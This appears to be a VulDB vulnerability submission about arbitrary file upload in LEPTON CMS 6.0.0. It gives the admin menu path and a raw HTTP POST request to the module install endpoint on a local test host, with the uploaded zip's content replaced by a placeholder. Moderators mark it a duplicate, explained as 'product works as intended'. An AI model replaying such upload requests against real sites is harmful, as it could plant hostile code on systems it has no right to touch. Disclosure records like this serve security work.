| Título | https://lepton-cms.org/ leptoncms 6.0.0 Arbitrary File Upload |
|---|
| Descrição | Menu ->add ons ->modules ->install (Upload a PHP file containing malicious code)
POST /LEPTON6.0.0/upload/backend/modules/install.php?leptoken=8ca7e18fb30dc95ac7874z1753067977 HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 605
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="127", "Not)A;Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh6XBRla9BlNIaIyi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: lep4399sessionid=60na1cdmru74b80iui1p4oar3c; cookieconsent_status=dismiss
Connection: keep-alive
------WebKitFormBoundaryh6XBRla9BlNIaIyi
Content-Disposition: form-data; name="userfile"; filename="ctfshow.zip"
Content-Type: application/x-zip-compressed
xxxxxxxxxxx
------WebKitFormBoundaryh6XBRla9BlNIaIyi
Content-Disposition: form-data; name="submit"
Install
------WebKitFormBoundaryh6XBRla9BlNIaIyi-- |
|---|
| Fonte | ⚠️ http://127.0.0.1/LEPTON6.0.0/upload/backend/modules/install.php?leptoken=8ca7e18fb30dc95ac7874z1753067977 |
|---|
| Utilizador | liule960117 (UID 88729) |
|---|
| Submissão | 05/08/2025 11h45 (há 9 meses) |
|---|
| Moderação | 09/08/2025 11h57 (4 days later) |
|---|
| Estado | Duplicado |
|---|
| Entrada VulDB | 259032 [Lepton 7.1.0 PHP File Elevação de Privilégios] |
|---|
| Explicação | product works as intended |
|---|
| Pontos | 0 |
|---|